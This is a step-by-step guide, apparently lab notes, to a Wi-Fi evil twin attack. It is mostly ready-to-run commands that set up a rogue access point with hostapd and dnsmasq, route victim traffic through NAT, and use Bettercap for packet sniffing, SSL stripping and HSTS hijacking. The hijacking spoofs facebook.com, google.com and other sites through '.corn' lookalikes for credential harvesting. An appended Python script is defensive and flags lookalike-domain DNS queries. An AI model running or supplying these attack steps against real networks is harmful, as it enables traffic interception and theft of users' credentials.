# Wi-Fi Evil Twin Attack & MITM

Setting up a fake Access Point to hijack network traffic for MITM attacks, packet sniffing, and credential harvesting.

## Check capability

Verify that the adapter supports **AP** (Master) mode:

```bash
iw list | grep "Supported interface modes:" -A 10
```

- **Requirement**: Output must contain `* AP`.

## Create Configuration (hostapd)

Define how the fake AP behaves.

### Option A: Open Network (No Password)

`open.conf`:

```ini
interface=wlan0
driver=nl80211
ssid=Test_Open
channel=3
hw_mode=g
```

### Option B: Secured Network (WPA2)

`secured.conf`:

```ini
interface=wlan0
driver=nl80211
ssid=Test_Secure
channel=3
hw_mode=g

# WPA2 Settings
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=CCMP
```

### Start Access Point

```bash
sudo hostapd open.conf
```

- **Success:** Look for `AP-ENABLED`.

## DHCP Setup

Assign an IP to the AP and provide IPs to clients.

### 1. Set Gateway IP

```bash
sudo ip addr add 192.168.1.1/24 dev wlan0
```

### 2. Start DHCP Server

`dnsmasq` handles IP allocation.

```bash
sudo dnsmasq --no-daemon --interface=wlan0 --dhcp-range=192.168.1.10,192.168.1.100,12h
```

## Routing Setup (NAT)

Enable clients to route traffic through your internet-facing interface (e.g., `eth0`).

### 1. Enable Forwarding & Clear Rules

```bash
# Enable IP Forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Clear old rules (Optional but safer)
sudo iptables -F
sudo iptables -t nat -F
```

### 2. Setup NAT

```bash
# Note: Ensure eth0 is your internet-facing interface
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Allow traffic forwarding (Crucial)
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
```

> [!IMPORTANT]
> ⚠️ **Troubleshooting: MASQUERADE Error (Kernel Mismatch)**
>
> **Scenario**: Occurs on Kali Linux when the system boots into a kernel for which the necessary NAT modules aren't installed (e.g., booting into a Real-Time kernel while the modules exist only for the Standard kernel).
>
> **Error**:
> `Warning: Extension MASQUERADE revision 0 not supported, missing kernel module?`
>
> **Verification & Fix**:
> 1. **Check Running Kernel**:
>    ```bash
>    uname -r
>    ```
> 2. **Check Available Modules**:
>    ```bash
>    sudo updatedb && locate xt_MASQUERADE
>    ```
> 3. **Solution**:
>    Reboot the VM. At the GRUB menu, select **"Advanced options for Kali GNU/Linux"** and choose the kernel version that corresponds to the modules found in step 2.
> 4. **Retry**: Run the NAT command again.

## SSL Stripping

![image](https://hackmd.io/_uploads/SkNsxZrBZx.png)

1. **Intercept**: The Fake AP intercepts the victim's initial HTTP request.
2. **Proxy**: Acting as a proxy, the Fake AP establishes a secure HTTPS connection with the target website on the victim's behalf.
3. **Strip & Replace**: Upon receiving the webpage, the Fake AP strips the encryption by replacing all `https://` links in the source code with `http://`. It then forwards the modified page to the victim, ensuring they remain trapped in an unencrypted channel.

### 1. Download Bettercap

```bash
sudo apt update
sudo apt install bettercap
```

### 2. Setup NAT forwarding rules

Force the victim's HTTP traffic into Bettercap before it goes to the internet.

```bash
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
```

### 3. Start Bettercap (Standard Mode)

Use this for basic HTTP sites (non-HSTS).

```bash
sudo bettercap -iface wlan0
```

#### Enable Sniffing & Proxy

Start the network sniffer and the HTTP proxy with the SSL strip module enabled.

```bash
# Enable Packet Sniffing
net.sniff on

# Enable SSL Stripping (Force HTTPS -> HTTP)
set http.proxy.sslstrip true

# Start the Proxy Server
http.proxy on
```

## HSTS Hijack

Standard stripping fails on most websites due to HSTS. Use this method to spoof domains (e.g., `google.com` -> `google.corn`) to bypass browser protection.

### 1. DNS Setup

Force any domain ending in `.corn` to resolve to the attacker's IP. This ensures the fake links generated by Bettercap are routable.

```bash
# Note: Ensure you kill the old dnsmasq process first
sudo killall dnsmasq
sudo dnsmasq --no-daemon --interface=wlan0 --dhcp-range=192.168.1.10,192.168.1.100,12h --address=/corn/192.168.1.1
```

### 2. Start Bettercap with Caplet

Update and load the HSTS Hijack script.

```bash
sudo bettercap -eval "caplets.update; ui.update; q"
sudo bettercap -iface wlan0 -caplet hstshijack/hstshijack
```

### 3. Configure & Launch (Inside Bettercap)

```bash
# 1. Set Targets (The domains you want to spoof)
set hstshijack.targets facebook.com,twitter.com,google.com,bing.com

# 2. Start Modules
# Spoof DNS responses to point to attacker
dns.spoof on

# Start Proxy
http.proxy on
```

## Cleanup

### Option A: Manual Cleanup

```bash
# 1. Stop services
sudo killall dnsmasq hostapd

# 2. Clear IPTables rules (NAT & Redirects)
sudo iptables -F
sudo iptables -t nat -F
```

### Option B: Reboot

```bash
sudo reboot
```
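A defender-side counterpart to the `.corn` lookalike trick in the HSTS Hijack section: this added Python example (not from the original page) scans dnsmasq-style query log lines for names that collapse onto a protected domain once common confusable character pairs (`rn` -> `m`, `vv` -> `w`, ...) are folded, while the raw name does not match. The protected list, the confusable table, the two-label registrable-domain rule and the log lines are constructed assumptions.

```python
"""Flag DNS queries for lookalike domains that mimic protected (HSTS) sites.

Added example; the domains, confusable pairs and log lines are constructed.
"""
import re

# Assumption: the sites a defender wants to protect (the page's target list).
PROTECTED = {"google.com", "facebook.com", "twitter.com", "bing.com"}

# Character pairs that render almost identically in many fonts (assumed set).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l")]

# dnsmasq log-queries format, e.g. "query[A] www.google.corn from 192.168.1.23"
LOG_RE = re.compile(r"query\[(\w+)\]\s+(\S+)\s+from\s+(\S+)")


def normalise(name: str) -> str:
    """Lower-case, strip trailing dot and fold confusable pairs."""
    name = name.lower().rstrip(".")
    for src, dst in CONFUSABLES:
        name = name.replace(src, dst)
    return name


def registrable(name: str) -> str:
    """Naive registrable domain: last two labels (no public-suffix list)."""
    return ".".join(name.split(".")[-2:])


def lookalike_for(qname: str):
    """Return the protected domain that `qname` impersonates, or None."""
    if registrable(qname.lower().rstrip(".")) in PROTECTED:
        return None  # genuine query for the real site
    folded = registrable(normalise(qname))
    return folded if folded in PROTECTED else None


def scan(lines):
    """Return (client, queried_name, impersonated_domain) for each suspect query."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # replies and non-query lines are ignored
        _qtype, qname, client = m.groups()
        target = lookalike_for(qname)
        if target:
            hits.append((client, qname, target))
    return hits


# Constructed sample log lines in dnsmasq's log-queries format.
SAMPLE_LOG = [
    "Jan  1 12:00:01 dnsmasq[1234]: query[A] www.google.corn from 192.168.1.23",
    "Jan  1 12:00:02 dnsmasq[1234]: query[A] accounts.google.com from 192.168.1.23",
    "Jan  1 12:00:03 dnsmasq[1234]: query[AAAA] facebook.corn from 192.168.1.23",
    "Jan  1 12:00:04 dnsmasq[1234]: reply www.google.corn is 192.168.1.1",
]
```

Run `scan(SAMPLE_LOG)` to get the two suspect queries; a query for the genuine `accounts.google.com` is not reported.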